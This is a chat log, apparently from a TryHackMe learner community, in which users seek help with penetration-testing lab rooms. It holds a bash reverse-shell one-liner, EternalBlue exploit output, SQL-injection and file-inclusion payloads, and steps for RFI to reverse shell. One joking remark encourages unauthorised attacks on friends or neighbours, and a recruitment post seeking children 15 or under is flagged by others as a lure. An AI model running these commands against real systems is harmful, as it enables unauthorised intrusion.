I used both; Python http to host the files and ngrok to expose it to the Internet so the target machine could access it. If I only used a server, I'm not sure how to make it accessible to a remote host from my Kali VM VPN'd to THM

got a little nerd-sniped and tried a couple more things this morning, like using my VPN IP (10.x.x.x) directly as the hostname. But no matter what, the playground times out trying to include it and show an empty file preview, even if I can access the exact same URL through my browser.
With one exception: if I put a URL for the target machine itself, it can access that. It just really seems like it's locked down to be unable to access any remote hosts, which completely defeats the purpose of demonstrating RFI

Hmm, using the VPN ip should've made it work. Idk, maybe the way you're doing RFI might be wrong, or the lab has some kinda problems.

May I have a hint on File Inclusion Task 8 question 2
Where i have to find flag2
I have changed the cookie to admin
But where do I put the request for the file ?

Hi,
I can't use burp's browser or the foxyproxy burp, i only have the GET request and the site never loads. The machine IP is working fine on firefox (i'm on the race condition room, i can connect with the 2 users on the website), but everytime i try to connect with burp, i can't. I'm on the THM virtual machine, the certificate is installed, and the proxy parameters are okay. What can i do ?
Thanks
I've already restarted burp, the attack box, the attack IP, firefox, etc

Next time I'm at it I guess I can try the AttackBox

After you have changed the cookie to admin and loaded the page there is a hint on the page...

oke

Is your country also so white ??

yes, snow white 😀

here also

some 1 - 2 cm

Mock site for SSRF room no longer has the Avatars for the final ssrf directory traversal

what is the ip for the acme site

nevermind

im trying to take a screenshot but it wont work

im on subdomain enumeration, task 6 virtual hosts

the command is
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://MACHINE_IP

the thing is, what is the machine ip

because this room doesnt have any machine i can start

is it the attackbox ip or is the ip of the site

but wait -u is for the host

i just remembered i forgot to turn on the vm at the start

Anyone else having issues with Windows Privilege Escalation > Task 6? The walkthrough states that the provided login should have SeBackupPrivilege but it does not.

C:\Users\THMBackup>whoami
wprivesc2\thmbackup

C:\Users\THMBackup>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

nvm.. had to right click cmd.exe and run as admin. was running cmd.exe through start > run > cmd.exe

Hi, Im in the file inclusion module task 8 question 3, how does the hint know this uses the $_REQUEST method how did it get that information?

also thanks in advance

As an attacker doing a black box test, you would not know this. You'd just have to guess, based on responses you are getting from the web app. The hint knows because the room creators know the source code of the PHP web app that they are using.

Have you managed to resolve it? I'm stuck on same step

EDIT: Ok, I was able to resolve it 🙂

what kind of clues would lead me to that conclusion? im still lost on that

• https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion
• https://github.com/OWASP/www-project-web-security-testing-guide/blob/master/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_File_Inclusion.md#testing-for-remote-file-inclusion

It is probably down to: understanding a bit of PHP, common ways that (old) web apps were (are) coded and common mistakes that developers make which lead to security holes.

Not sanitizing $_GET is one and I think $_REQUEST is less common but looks like it gets mentioned in some places. There are also automated tools that will try many of the common "tricks". Finding a parameter like ?file=something is a good indicator to look more closely.

yea, it seems very strick on the order of clickin the provided links -- cant access the avatars from the same link used to create the account. a bit of an odd workflow

I have no idea how to give rep +1 but assume I did

can anyone help me with attack box

Hey peepz, need help
Stuck on Intro to Cross-Site Scripting
Every task was great until last one, netcat is listening but no matter how long i wait i get no incoming requests. Yes, im using attack box, yes payload has correct ip and port as well as nc does

😕

The cheat sheet link in command injection room doesn't work anymore

Yeah, I've reported this via the feedback form. Use web.archive or Google any different one. Personally I just used web.archive - https://web.archive.org/web/20251112071014/https://github.com/payloadbox/command-injection-payload-list

Hi, I'm currently stuck on the LFI/RFI lab. I'm trying to achieve RCE by hosting a PHP shell and providing the HTTP link to the vulnerable parameter. I've tried using python3 -m http.server, but it isn't working. Could someone explain the correct way to make my local file accessible to the target machine? Do I need to use a specific IP or interface?

try python -m http.server instead

ok thanks

Gave +1 Rep to @versed snow (current: #1039 - 6)

and if it still doesn't work, send us screenshot or text of the error

Also, if you are on your own machine, try using the attack box, sometimes it's config problems

I was stuck in that room for two days, turns out I was using my own machine, when I switched to the attack box it instantly worked

Just finished that part. I think there's an issue with the question tbh. I put the right answer just to move on, but theoretically it doesn't seem right

Hi everyone,
I’ve completed the TryHackMe Pentester path and I’d like to know what the next logical step is to keep practicing in a structured way.

Should I focus first on specific rooms/modules (Active Directory, Web exploitation, privilege escalation),

My goal is to practice realistically, reinforce fundamentals, and progressively move toward real-world pentesting scenarios.

Thanks in advance for your guidance 🙂

Do it again and again

thanks, is there any challenges or walkthroughs that could be done ? thanks

Gave +1 Rep to @paper gale (current: #3539 - 1)

bro It's very defficult to advice you single thing but you need to somthing real like penetrate of your friends or some neighbor systems do all the stuff with your own systems or your college servers if you have permission if you don't then do it for just "educational" purposes only .🤣

Hello everyone well this is just something I want to to do actually soo basically I want to have a group of both newbies and experienced people in th world of cybersecurity mainly red teaming and penetration testing so we can all learn together and build ourselves. I know some might have some contradictory opinions but it's just what I think works. Soo anyone interested?.

Hello 👋

Dear Penetration tester how are you..?

What's going on

yes interested !

i just finished it without any problems ig u had a mistake on the hostname command file (the php one) , and about the challenges i didn't do them cause i heard i gotta learn burp suite first

I am !

any one know about that how to access linux terminal from window?

yes

and also guide me about how to transfer files between window and kali

Would depend on your scenario

also any really experienced dudes wanna join

Yoo sure

yes

Pentest+ resources and timeline?

Gave +1 Rep to @jagged river (current: #147 - 70)

Yh
I could like to join

That sound awesome, but I don't know if I'm ready yet. I'm still going through the learning paths and haven't done any capture the flags yet

no problen hit me up if ur comfortable joining

what time zone are you guys in. I'm in Eastern

Hola guys I need vps/vpn. Any spare one

you mean an image?

linux privilege escalation - task 6

tried nano to get as shown below but not abel to get root

any solutions i even tried with my attacker box and as well as , restarted machine many times no luck could someone help on this

?

used this one

did you get it to work?

and did you find the answer to the first question in task 6?

it fixed i restarted whole env 3 times

something bugged out

thanks btw

I’m interested

Yes

Does TryHackMe bug out very often?

I'm interested too

Hello.
Does this path leave a free certification at the end?

no the certificates are paid

is there a certification of completion?

i think you get an image that you can use, but I havent' completed it yet so i don't know

After finishing the course, I still feel at a loss about how to tackle certain things.

Propably go do some challenges, the easy ones are quite fun and when you get stuck you can use a tutorial to see what you are supposed to do next

Hi everybody,

Today is a good day for me. For once, I was able to get all the flags smoothly (File Inclusion, Task 8, the challenge) without having to dig a lot through the web, and it didn't seem very difficult to me (whereas in challenges there is usually a step where I struggle), so I guess I'm finally getting a bit better (or at least maybe I suck a bit less).

Anyway, my question is: for Flag3, $_REQUEST is mentioned, but I didn't need it, with just the (SPOILER) ||null byte|| I was fine. Am I missing something here? I have the feeling that the room was trying to show me something with $_REQUEST but I don't know what. Any idea? And is it important?

Also, for the RCE in Lab #Playground, it was surprisingly easy, (SPOILER) ||I just took the first random PHP reverse shell from revshells.com|| and it worked just fine. I was just wondering if ||there is some kind of "super shell" that is more stable and that you'd recommend rather than revshells.com's shells?||

i think you can stabilise your shell somehow to make it more user friendly and make it so ctrl + c doesnt throw you out, im not sure how to do it but there definitly is a way

Oh ok, that would be great. The Ctrl + C issue can quickly become very annoying I think. In the meantime I'll see if I can find something myself.

Oh and also, the _$REQUESTS was referring to the fact that it was made out of $_POST $_GET and $_COOKIE that's what i understood from it

Because i think in one of the tasks the $_GET didn't work and you had to use the $_POST instead as i remember

There's a room about shells, including netcat stabilisation: https://tryhackme.com/room/introtoshells

it's just further down the jr. pentester path

I had an Interview and the task was to find the 5 most critical vulnerabilities on a Domain (e.g google.com). How are the steps to do that for an jr position? Ty 🙂

you sound like you just came here and think you can hack google in 5 seconds

spoiler

||you aint hacking google in 5 seconds||

Hi, thanks. Indeed, I had seen it before, and since it's in the Jr Pentester path, I intended to simply wait until I reach it.

Gave +1 Rep to @versed snow (current: #375 - 23)

IM trying the sql injection room
And I try this :

https://website.thm/analytics?referrer=referrer=admin123' UNION SELECT SLEEP(5),2 where username like 'adsin%

but why is this given me ok and a short time ?

Is this issue occuring from my side ??

go to: ----> manage account (settings) -----> vm and vpn settings -------> VM region and set it to europe ireland or US East depending which one is closer to you

Anyone who can help me with the problem I posted yesterday ??

which task is it?

sql injection - task 8

anyone with clues on finding flags in
:Viewing The Page Source (walking an application)

msf exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.1.26:4444
[*] 10.66.129.103:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.66.129.103:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.66.129.103:445     - Scanned 1 of 1 hosts (100% complete)
[+] 10.66.129.103:445 - The target is vulnerable.
[*] 10.66.129.103:445 - Connecting to target for exploitation.
[+] 10.66.129.103:445 - Connection established for exploitation.
[+] 10.66.129.103:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.66.129.103:445 - CORE raw buffer dump (42 bytes)
[*] 10.66.129.103:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.66.129.103:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.66.129.103:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.66.129.103:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.66.129.103:445 - Trying exploit with 12 Groom Allocations.
[*] 10.66.129.103:445 - Sending all but last fragment of exploit packet
[*] 10.66.129.103:445 - Starting non-paged pool grooming
[+] 10.66.129.103:445 - Sending SMBv2 buffers
[+] 10.66.129.103:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.66.129.103:445 - Sending final SMBv2 buffers.
[*] 10.66.129.103:445 - Sending last fragment of exploit packet!
[*] 10.66.129.103:445 - Receiving response from exploit packet
[+] 10.66.129.103:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.66.129.103:445 - Sending egg to corrupted connection.
[*] 10.66.129.103:445 - Triggering free of corrupted buffer.
dir
[-] 10.66.129.103:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.66.129.103:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.66.129.103:445 

why its failing...

maybe check options again?

hej

kali linux or parrot OS?

in a meaning which one is better?

yeah

I only know kali linux so i can't really say which one is better

is it good for red teaming?

Can someone tell me why is it that WormGPT is highly not preferred for bug bounty and while black hats use it most of the time a single attack from that thing can shutdown companies so how do companies stop such attacks

What's wormGPT

An ai that can do automated attacks it can learn and adapt so basically the more it attacks no matter if it succeed or not it will learn and improve so basically it's a nuclear bomb 😀

sounds like something an ai lover would say

That's funny coming from you

oo

oops

what do you mean by that?

Nothing

i'm just saying that i don't believe ai's can be that good as you say

It's true if you don't believe search for yourself the thing was shutdown from the eyes of the public it can do even more

People propably don't use ai's to do bug bounty because it learnt from things that already happened and in bug bountry you are meant to find new ones + ai's in my opinion are unreliable

True l won't argue with that but it depends on how you made the ai view the work

Yeah, propably it's very lightweight it got most of the tools, exploitdb installed in it, and i honestly like it's look

Have you any knowledge of it, or have you carried out an attack with it before

Hey, I am finally on the intermediate-level rooms, and I am proud of myself. However, I do need to do more challenges.

Can you give me link to download debian 12 iso please.

I am in the File Inclusion room (first intermediate room), and I am having some trouble with trying to figure out the challenge answers even though I have done all the previous questions along with looking at walkthroughs for the room. I just want to be able to do it on my own, so I decided to not just ctrl+c ctrl+v the answers :3

I did but it costed me $2000 find

Hi guys !
I pass the eJPT this weekend, which room or challenge i have to focus to ensure a success ?
Thanks !

2000$?! that's atleast 64gB of ram

Atleast learnt something useful?

Yes l Wil never use overpowered ai

Congrats you are smarter than 99% of investors these days

anyone here good at doing RFI attacks? im confused on the RFI challenge in the jr pentester path

Hello everyone, i'm stuck on Challenge 3 of File Inclusion module.
I've tried using cookies,POST,GET with this payload: ../../../../etc/flag3%00 but it just doesn't work, may anyone help?

Edit the url itself

Add the %00 to the url

Hello

I’m looking for someone skilled in reverse engineering I’m paying good money

i just finished authentification bypass room, where i can practice it if anyone know

specially logic flaw and cookie tampering

Hi! I’m looking for three people to join a small CTF team. I’d prefer if you’re 15 or younger and live in a time zone that’s at most ±2 hours from Finland (UTC+0, UTC+1, UTC+2 or UTC+3). The goal isn’t to jump into competitions right away — first we’d get to know each other, practice together, and build a good team dynamic. I’m a beginner and want to improve step by step toward intermediate‑level CTFs. If you’re interested in learning and practicing together, feel free to message me!

Me

Lemme join

Why does this feel like a lure

Because it propably is

What's the avg time ppl take to complete jr penetration path

It depends how much time you can allocate to it, your background and how fast you absorb knowledge. It's tricky to compare it with other folks.

Currently working through the Jr. Pen Tester path and had a few questions: 1. When a device on one subnet wants to ping a device, I understand that the device must first send an ARP request in order to populate its ARP table with the MAC address/IP address. What about when the device I want to ping is on a different subnet than my device? I can't use ARP since it doesn't go past routers. Does the router then send a broadcast to the other subnet trying to reach the correct endpoint?

Very good question 🙂 . Your device will "wrap" that ICMP packet with destination IP inside into an Ethernet frame that it will send to your default gateway (router). Router will find destination subnet based on that IP from "wrapped" ICMP packet and send request to the default gateway of that subnet. Default gateway of the targeted subnet will then perform ARP request on the targeted subnet and return response to your gateway , which will forward that response back to your device .

Why is nmap able to detect what OS a machine is running without a full TCP connection, but not what versions are running on each port?

Hi everyone. I am stuck on task 4 of File Inclusion.

What do you mean - nmap cannot detect the service running on each port?

A full TCP connection is established through a three-way handshake: SYN - SYN/ACK - ACK. When using the stealth scan (-sS), Nmap prevents the connection from being fully established by not sending the final ACK (instead, it usually sends an RST).

​Nmap can still perform OS detection at this stage by analyzing the characteristics of the SYN/ACK response. Different operating systems have unique 'signatures' in their TCP/IP stack implementations, such as specific TTL (Time to Live) and Window Size values.

​However, service version detection (-sV) works at the application layer. To identify a version, Nmap needs to exchange data with the service (like a banner grab or a specific probe). This interaction requires a full TCP connection to be established first so that application-layer data can be transmitted.

Starting jr penetration testing , ready to give 4-5 hrs daily how time will need to complete it

You can use learning scheduler to estimate completing time.

I'm struggling with Windows Privilege Escalation room, task 6. I constantly get disconnected from machine after a while or I have following error when trying to connect through xfreerdp3. Already tried changing VPN region.
[17:40:21:510] [58580:0000e4d6] [ERROR][com.freerdp.core] - [freerdp_tcp_default_connect]: Couldn't get socket ip address

Anyone is having similar issues?
When using Remmina I also get disconnected

[17:46:11:316] [61650:0000f0d4] [ERROR][com.freerdp.core.transport] - [transport_read_layer]: BIO_read returned a system error 104: Connection reset by peer [17:46:11:316] [61650:0000f0d4] [ERROR][com.freerdp.core] - [transport_read_layer]: ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D] [17:46:11:316] [61650:0000f0d4] [INFO][com.freerdp.client.common] - [client_auto_reconnect_ex]: Network disconnect!

I guess something either with the machine in the task or AWS issues

Yea, same in other task :/ meh

There is a bug i think on Nmap basic port scans ( premium room) in task 5 , when i preform ' nmap -sS <Machine_IP> ' im suppose to recive an open port with 4 digits and im not reciving this kind. and im executing the same command as needed.

Are you scan the right machine?

Since task 4,5,6 has their own machine

Ohh that’s probably the problem….

Thnx

How would I determine what my Auth Username and password is ?

Hello,

IM stuck at the vulnerabilty room

I use 50477 as shell but whatever I do I see this :

root@ip-10-80-95-16:~# python3 50477.py -u http://10.80.181.232
[+]Connecting...
Enter Command $ls
system

Enter Command $

What can I do to come further in this room ?

Did you try to enumerate it? What OS version is it running? What are the folder contents? Did you try and see if you can get a reverse shell?

I only run the exploit found with searchsploit

and I tried this :

Enter Command $bash -c 'bash -i >& /dev/tcp/10.80.95.16/4444 0>&1'

But no answer back

Have you tried other reverse shell payloads?

I try the bash ones and it if those doesn't work, I try to python ones

no bash ones to find

fuel CMS 1.4.1 - Remote Code Execution (1)    | linux/webapps/47138.py
Fuel CMS 1.4.1 - Remote Code Execution (2)    | php/webapps/49487.rb
Fuel CMS 1.4.1 - Remote Code Execution (3)    | php/webapps/50477.py
Fuel CMS 1.4.13 - 'col' Blind SQL Injection ( | php/webapps/50523.txt
Fuel CMS 1.4.7 - 'col' SQL Injection (Authent | php/webapps/48741.txt
Fuel CMS 1.4.8 - 'fuel_replace_id' SQL Inject | php/webapps/48778.txt

No, I meant using the same exploit, but using other reverse shell payloads for an interactive shell.

oke, then I have to think how I can use other reverse shells for that

Hi, try a mkfifo one

I will

You can choose from the ones in revshells.com, payloadsallthethings and there is a newer platform which I can't remember off the top of my head

Thanks

I did over look... "start attack" opens a new intruder attack window in background, working within a tight screen environment - found it! Disregard product warning when initiating attack, as it appears to be for information only.

Did you solve it?

The syntax of php in the python code is an old one. You have to edit the exploit file to adapt to the new php version

I did solve it but with the exploit given as a way you could not solve it

Hey everyone, I’m working on a Level 3 SQLi lab and I’ve hit a wall with a server-side filter.
The Setup: I've bypassed the front-end JS and I'm using 'Edit and Resubmit' in the Network tab to hit the id parameter directly. The server returns 'Dangerous Command' for almost everything. I’ve tried:
Standard UNION SELECT (with case folding/comments)
Boolean logic like 1' AND 1=1--
URL/Hex encoding the keywords.
I also noticed a csrftoken and dual sessionid cookies (one for / and one for /level3).

is this a Blind SQLi case where I need to bypass space/keyword filtering using alternative whitespace characters, or should I be looking at a different Vector (like the Cookies or CSRF token) because the id param is a honey-pot? Not looking for the flag, just a nudge on the filter logic!"

Hi guys,
I'm stuck on windows privilege escalation room- task 6. I'm not able to start a smbserver with impacket with the same commands from the task:
Any help would be appreciated:)

It says OSError: Errno 98 Address already in use

Are you using the Attackbox or your own VM?

Attackbox

Attackbox doesn't have impacket installed, i had to install manually.

Hello,
im stuck at Upload Vulnerabilities room, the intro of the room tells us to edit /etc/hosts file since the room is using virtual hosting. I followed the steps exactly still for some reason i cant access the website for the practical of the room.
If anyone else has already encountered this or has a solution pls DM or reply.

what should i do after finishing jr pentester path? do i start solving challenges so i can hone my skills? if so what challenges should i start solving?

Maybe start with easy and medium rated challenge rooms to get a feel of how to apply what you've learned.

is there a specific way i should be solving them?

I don't think there should be, but more of finding a methodology that works for you.. from information gathering, exploitation, post-compromise, etc.

okay thank you

Hello guys. Please i am having trouble with this room:Intro to SSRF. I have done the task, i am unable to gget the flag.

Please help if you can.

right click radio button of any image and click inspect then set the value as x/../private then click that radio button and update profile picture with you'll see empty profile picture then right click the empty profile picture and press view page source

Okay thank you for your response. lemme do it.

Gave +1 Rep to @distant plinth (current: #3698 - 1)

when you say an empty profile picture, do you mean a picture with no radio button or what do you mean by empty rofile please?

when you update your profile picture it reflects above profile pictures to show you which profile picture you currently have what i mean by empty is when you set the value to something else so no profile picture will appear there

i believe you can type the room name followed by tryhackme on youtube and you'll find videos about ppl doing the room so that can help you

appreciate.

glad i was able to help also make sure not to include machine ip addresses in screenshots i think it's safer that way

Gm guys

gm gm

are you on jr pentester path or veteran youre in cyberscurity ?

❤️

I am a cybersecurity student in my 4th year

@barren matrix send me a friend request

Oh great nvm which country ?

Nigeria

Hi

oh great so which topics you have do u have hands on practice or nah nto yet

I am a great hacker way above my peers, I can hack websites, hack Windows and Linux systems, hack CCTV, hack mobile phones create spyware and malware

Which is youre main domain ?

osint

pwn rev or wot

Main domain??

Core Focus In which domain I meant by job or focus

Example osint , pwn ,rev , malware dev etc

WoT, osint
, malware

Good

What about you?

which distro youre using btw ?

vuln researching

Kali

good

You have anything on GitHub?

Let's partnership me you in your dm

I keep my things private hosted Kinda Im running A team so

Ohh okayy

dm

hey, there is a dead link in this room : https://tryhackme.com/room/oscommandinjection task 5, the cheat sheet goes to a non-existent repo

Can you suggest me wifi adapter for injection please

guys i am confused when im trying to gain root access after finding the setImpersonator is enabled

yes it is heres the wayback result for that cheat sheet

https://web.archive.org/web/20251112071014/https://github.com/payloadbox/command-injection-payload-list

Hi guys, I'm currently doing the "Vulnerabilities 101" room. In task number 4, they ask: "Using NVD, how many CVEs were published in July 2021?" I've searched and found that the answer is 1,585, but THM says that's incorrect. Why?

Have you filtered out the rejected ones? If you look at the Advanced Options you should be able to see it.

Gm guys

thank you

Gave +1 Rep to @prisma raptor (current: #11 - 937)

For pen testing lab should i set up kali on my main pc in a vm or on vm on proxmox server?

Kali in a VM would be good as you can just take snapshots and don't have to build from scratch if something happens

Thank you

Gave +1 Rep to @prisma raptor (current: #11 - 941)

Hey everyone , can you help me in RCE task ? How we can execute the attack please

Which room and task number are you on?

File inclusion room task 8 the last one

What you have is an RFI (remote file inclusion) vulnerability. You can enter link to your php reverse shell to gain RCE. Just host it locally or in the attackbox with python http.server

I understand the main idea but i dont know where php file should be created and the server to implement the attack

1. Use the shell here https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php, create one locally and change the ip and port values

2. start http server locally with python -m http.server $PORT (different from port in step 1.)

3. start nc listener for the reverse shell, and try to access your shell from the site

Hi, does anyone have a summary of the commands, organized by topic, for the entire learning path? I finished it but didn't take notes.

Thanks will try this steps

Gave +1 Rep to @stiff oxide (current: #1834 - 3)

Hey everyone, I’m new here 👋
I just started the junior pentester path ,
Any advice on what I should focus on first?

what's industry best practice? I run a Mac, should my pen testing be done directly on my machine or should I run something like Kali in VM?

I am learning networking & WiFi security, can someone guide beginner resources?

https://tryhackme.com/path/outline/presecurity

Nah, you should try to complete it first. All the knowledge is necessary. Then you should practice with easy to medium challenges.

I deleted my post, because I just realized that I didn't go through enough.. I found the real flags

Hi, does anyone have a summary of the commands, organized by topic, for the entire learning path? I finished it but didn't take notes.
Notion, Obsidian, google docs, word, txt, etc

HI

anyone facing issues - were the machine ip address doesnt appear even after starting the attackbox in excercises ?

Also, as there are lot of tools being discussed, are we expected to remeber all of them for the certification examination ?

+1

i was considering creating a bootable kali linux

vm is ok generally ?

Seems good

You dont care if something is broken

@hybrid quest yeah. may be try this link to make the bootable - https://www.youtube.com/watch?v=kMnKzBJ4ZHE

i will be doing this tomorrow and can update how did i go with it

I ended up using UTM on my Mac. Works well

@mint pilot i am using virtualbox but seems very slow ? would you reckon UTM is faster ?

anyone doing any projects to put on github while doing this course. ? any ideas ?

use qemu its faster than oracle virtual box

and smooth

@barren matrix thanks mate - are you working on any project as well while doing this course ?

Gave +1 Rep to @barren matrix (current: #3754 - 1)

Rn Nupe i usually checkout here if anyone stucked
So Im already working profesional

how to download qemu

i was at 57% 5 min ago

at least there's new content

i was at 96% lol, I won't have the pleasure of finishing this path 😭

i'm at 20% now

I was feeling bad that I was not doing too many modules this week

not anymore

The OWASP10 module is still missing A10

however, the beginner challenges module looks good

yes, it is on the path now

in the second room

I was at 33% complete and I'm now 3% 🤔
There seems to be way more content in the pathway now...

@gentle bridge Hi

way more content now

i think it was around 30 hours to complete it before

now it's 90

The revamp is actually awesome

😂😂 when they did same with presecurity it triggered me i didntwant to finish it again

Is the old jr pentest certificate of completion erased then ?

For the people that habe already done it before

I have been following SEC1 but so confusing. like try many tools for just introduction. and now I jumped to jr.pentest better. anyone relate?

i did jr pentest directly because the other one were just intro, and the intro is also present again in jr prentest so you are missing on nothing

still not there

who can we talk to about it?

Owasp top shit

I was at 99% completion on the old track and just got reset to 0% with this new path. Feels bad.

Just had to finish up with windows privesc

I think theres a error in the first room Guided Pentest: Web for Task 6 the flag you need to use this following command which does not work

If I start the attackbox nothing happens there but if I start the Target Machine both IPs get filled

yes that looks wrong

the first IP should be the target machine and the second ip the attacker machine

Accessing the webshell on the target machine and connecting to the attacker machine

ye

thought i go stupid ^^

I can post it in bug report but thought as its new room raffle etc someone might wanna check it out right away lol

Is anyone having an issue with the raffle tickets not being awarded after restarting labs that had already been done? Just want to check before logging a bug report if its a known issue

Hey everyone, we have made the Proxy challenge room private for the time being, so we can get it fixed properly. 🙏

Hello in the Penetration Testing Framewokrs room on task 9 the last question is broken or not ??
I think i answer correct and i cannot submit it

:/

??

Look in the introduction section if you have not

Oh thanks hahaha

Gave +1 Rep to @elder leaf (current: #1504 - 4)

with the rooms that provide tickets but previously I already had them solved how can I get the tickers

Please check again, should be fixed 👍

Yeah looks good now : )

i had previously completed jr pentester module but after revamp do i need to re-do it again?

Need to? Nope
Should you? Absolutely